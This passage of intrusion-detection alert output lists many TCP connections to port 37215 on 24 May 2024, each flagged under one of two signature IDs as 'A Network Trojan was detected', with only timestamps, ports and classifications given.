              Timestamp:05/24/24-10:59:19.921207
              SID:2829579
              Source Port:36420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543864
              SID:2829579
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204373
              SID:2829579
              Source Port:48452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798853
              SID:2829579
              Source Port:58530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856535
              SID:2835222
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361271
              SID:2829579
              Source Port:52372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128594
              SID:2829579
              Source Port:60308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204872
              SID:2829579
              Source Port:53676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097269
              SID:2835222
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061338
              SID:2829579
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624812
              SID:2829579
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099535
              SID:2829579
              Source Port:53122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433415
              SID:2835222
              Source Port:47030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602733
              SID:2829579
              Source Port:51140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.410837
              SID:2829579
              Source Port:44770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451064
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113696
              SID:2835222
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816176
              SID:2835222
              Source Port:40560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235730
              SID:2829579
              Source Port:35128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459872
              SID:2829579
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280244
              SID:2835222
              Source Port:57324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920881
              SID:2829579
              Source Port:51170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189489
              SID:2835222
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343679
              SID:2835222
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375026
              SID:2835222
              Source Port:57170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080903
              SID:2835222
              Source Port:33786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441440
              SID:2835222
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480450
              SID:2835222
              Source Port:50532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196903
              SID:2829579
              Source Port:45764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341238
              SID:2835222
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372031
              SID:2835222
              Source Port:43914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360565
              SID:2829579
              Source Port:33364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504849
              SID:2835222
              Source Port:54866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186579
              SID:2835222
              Source Port:43112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341224
              SID:2829579
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448676
              SID:2829579
              Source Port:60564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751587
              SID:2829579
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433471
              SID:2835222
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661259
              SID:2829579
              Source Port:36234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065765
              SID:2829579
              Source Port:44020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534385
              SID:2835222
              Source Port:59578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534440
              SID:2835222
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100591
              SID:2835222
              Source Port:34040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279177
              SID:2829579
              Source Port:45442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628130
              SID:2835222
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695052
              SID:2829579
              Source Port:34458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114528
              SID:2829579
              Source Port:45594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.573957
              SID:2835222
              Source Port:39052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444184
              SID:2829579
              Source Port:54940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597728
              SID:2835222
              Source Port:51466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188820
              SID:2835222
              Source Port:60652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671784
              SID:2829579
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920366
              SID:2835222
              Source Port:36854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064604
              SID:2835222
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045252
              SID:2835222
              Source Port:48116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368443
              SID:2835222
              Source Port:35444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505795
              SID:2829579
              Source Port:43160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918230
              SID:2829579
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097675
              SID:2835222
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097340
              SID:2829579
              Source Port:60606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197435
              SID:2835222
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308562
              SID:2835222
              Source Port:50114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287964
              SID:2829579
              Source Port:49272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515593
              SID:2829579
              Source Port:52260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764526
              SID:2835222
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395582
              SID:2829579
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832466
              SID:2835222
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575621
              SID:2835222
              Source Port:56430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574352
              SID:2835222
              Source Port:60096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535916
              SID:2835222
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519454
              SID:2835222
              Source Port:35464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300283
              SID:2835222
              Source Port:56382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044497
              SID:2835222
              Source Port:33580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432431
              SID:2829579
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302940
              SID:2829579
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201231
              SID:2829579
              Source Port:34950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585000
              SID:2829579
              Source Port:57896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467851
              SID:2829579
              Source Port:50492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122519
              SID:2829579
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600507
              SID:2835222
              Source Port:52152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624437
              SID:2835222
              Source Port:50672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209644
              SID:2829579
              Source Port:37292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100412
              SID:2835222
              Source Port:37546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507487
              SID:2829579
              Source Port:56332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119770
              SID:2829579
              Source Port:56652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080683
              SID:2835222
              Source Port:60516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347787
              SID:2829579
              Source Port:58318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201755
              SID:2829579
              Source Port:54138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076964
              SID:2835222
              Source Port:56500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759781
              SID:2835222
              Source Port:32778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965701
              SID:2835222
              Source Port:36868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397180
              SID:2835222
              Source Port:38346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2835222
              Source Port:42538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109260
              SID:2835222
              Source Port:45756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383284
              SID:2835222
              Source Port:59978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393884
              SID:2829579
              Source Port:59438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763293
              SID:2829579
              Source Port:42354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404611
              SID:2829579
              Source Port:42806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484952
              SID:2835222
              Source Port:40460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971138
              SID:2835222
              Source Port:45044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070997
              SID:2829579
              Source Port:50214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098772
              SID:2829579
              Source Port:51064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124083
              SID:2829579
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231627
              SID:2829579
              Source Port:32792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161174
              SID:2835222
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821244
              SID:2835222
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536017
              SID:2835222
              Source Port:48154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198651
              SID:2835222
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100698
              SID:2835222
              Source Port:33564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404451
              SID:2835222
              Source Port:37776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871930
              SID:2835222
              Source Port:35322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629616
              SID:2829579
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576481
              SID:2835222
              Source Port:54578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446390
              SID:2835222
              Source Port:58386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485291
              SID:2829579
              Source Port:55250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920420
              SID:2829579
              Source Port:33528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495338
              SID:2835222
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480914
              SID:2829579
              Source Port:32880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633558
              SID:2829579
              Source Port:51328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581838
              SID:2835222
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098123
              SID:2835222
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871644
              SID:2829579
              Source Port:41298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109577
              SID:2829579
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484611
              SID:2835222
              Source Port:33610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816077
              SID:2829579
              Source Port:58482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685029
              SID:2835222
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575193
              SID:2835222
              Source Port:41530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148748
              SID:2835222
              Source Port:52652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537867
              SID:2829579
              Source Port:33648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100941
              SID:2829579
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441262
              SID:2829579
              Source Port:38638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188143
              SID:2829579
              Source Port:46208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114567
              SID:2829579
              Source Port:41770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308755
              SID:2829579
              Source Port:50728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886025
              SID:2829579
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329740
              SID:2835222
              Source Port:50754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483092
              SID:2835222
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763895
              SID:2829579
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420435
              SID:2835222
              Source Port:34800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918141
              SID:2835222
              Source Port:46414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537720
              SID:2829579
              Source Port:37146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459572
              SID:2829579
              Source Port:49654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150786
              SID:2835222
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269191
              SID:2835222
              Source Port:36072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493210
              SID:2829579
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579224
              SID:2835222
              Source Port:34622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801635
              SID:2829579
              Source Port:49850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866463
              SID:2829579
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154332
              SID:2829579
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099829
              SID:2835222
              Source Port:35786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490983
              SID:2829579
              Source Port:55106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597908
              SID:2835222
              Source Port:55684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368452
              SID:2829579
              Source Port:41172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099576
              SID:2835222
              Source Port:37324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431314
              SID:2829579
              Source Port:47348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067951
              SID:2835222
              Source Port:45922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536937
              SID:2829579
              Source Port:42924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628100
              SID:2829579
              Source Port:58180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071028
              SID:2835222
              Source Port:49868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482925
              SID:2829579
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411090
              SID:2829579
              Source Port:53426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369072
              SID:2829579
              Source Port:48986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053698
              SID:2829579
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830458
              SID:2829579
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923744
              SID:2829579
              Source Port:37602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105670
              SID:2829579
              Source Port:41906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109418
              SID:2835222
              Source Port:57832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102129
              SID:2829579
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123820
              SID:2835222
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630631
              SID:2835222
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505750
              SID:2835222
              Source Port:48866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856975
              SID:2829579
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872382
              SID:2835222
              Source Port:38274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057514
              SID:2829579
              Source Port:59728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975459
              SID:2829579
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187547
              SID:2835222
              Source Port:41272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536889
              SID:2835222
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308755
              SID:2835222
              Source Port:45742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972142
              SID:2835222
              Source Port:51454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278661
              SID:2829579
              Source Port:55614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.185929
              SID:2835222
              Source Port:55360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075426
              SID:2835222
              Source Port:60458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204490
              SID:2835222
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118326
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744776
              SID:2835222
              Source Port:36054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826093
              SID:2835222
              Source Port:38810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2835222
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545481
              SID:2835222
              Source Port:33758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421008
              SID:2835222
              Source Port:43216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235592
              SID:2835222
              Source Port:38292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837305
              SID:2829579
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636818
              SID:2835222
              Source Port:48664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661915
              SID:2835222
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233722
              SID:2835222
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400749
              SID:2829579
              Source Port:53398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429735
              SID:2835222
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642976
              SID:2835222
              Source Port:33214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532284
